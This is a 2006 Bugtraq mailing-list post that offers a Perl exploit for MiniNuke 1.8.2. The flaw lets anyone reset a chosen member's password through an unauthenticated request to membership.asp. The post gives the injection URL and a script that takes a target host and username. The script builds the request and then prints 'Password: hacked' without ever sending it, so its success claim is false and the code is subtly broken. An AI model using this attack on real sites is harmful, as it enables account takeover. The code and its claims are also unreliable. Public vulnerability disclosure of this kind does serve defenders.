[xpl#2] MiniNuke 1.8.2 - change member's passwrod < Perl >

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [xpl#2] MiniNuke 1.8.2 - change member's passwrod < Perl >
From: hessam@xxxxxxxxxxxxx
Date: 29 Jan 2006 18:17:22 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

I create exploit for a bug at Mininuke ; this bug at "membership.asp"
and you can with this exploit change members password :)
if you inject:
" /membership.asp&pass=[New password]&passa=[confirm new password]&x=[member 
name] "
This bug found by nukedx & exploit by Hessam-x

---------
+ APP name  : Mininuke
+ Version   : 1.8.2
+ exploit by: Hessam-x
+ Type      : High
+ Des       : with this exploit you can change user's password
+ IHST - Iran Hackerz Security Team (Hackerz.ir)
+ KuT  - Kachal667 under9round team (Kachal667.com)

 Exploit type : Perl
[-- PERL C0DE --]


#!/usr/bin/perl
#--------------------------------------------------------#
#-      => Mininuke  1.8.2
#-      Founder nukedx & Exploit by Hessam-x
#-      www.Hackerz.ir Iran Hackers Security Team
#-      Hessam-x  <> irc0d3r|at|Yahoo.com
#-      Spescial Thanx : all iranian Hackers & Str0ke
#-      IR4N H4CK3RZ S3CURITY T34M
#--------------------------------------------------------#
# This bug at Membership.asp
use IO::Socket;

if (@ARGV < 1)
{
print "\n============================================\n";
print "\n         IRAN HACKERZ SECURITY TEAM         \n";
print "\n============================================\n";
print "\n                                              ";
print "\n   MININUKE 1.8.2                             ";
print "\n   Exploit by Hessam-x & Found by nukedx      ";
print "\n   www.Hackerz.ir Iran Hackers Security Team  ";
print "\n                                              ";
print "\n============================================\n";
print "Usage : minimuke.pl [HOST] [Member name]\n\n";

  print "Examples:\n\n";
 print "   mininuke.pl www.Site.com admin \n";
 exit();
}

my $host = $ARGV[0];
my $usero= $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "Cannot connect to $host" }

print "[+]connected\n";

$addr = "GET /membership.asp?pass=hacked&passa=hacked&x=$usero&B1=Send 
HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password ...\n";
print "[+] :D OK \n";
print "Username: $usero\n";
print "Password: hacked\n\n";

[/-- PERL CODE --]

# Hessam-x (Hessam M.Salehi)- www.hessam.org

Prev by Date: [SECURITY] [DSA 951-2] New trac packages fix SQL injection and cross-site scripting
Next by Date: RE: Cross Site Cooking
Previous by thread: [SECURITY] [DSA 951-2] New trac packages fix SQL injection and cross-site scripting
Next by thread: Arescom NetDSL-1000 DoS atack source
Index(es):
- Date
- Thread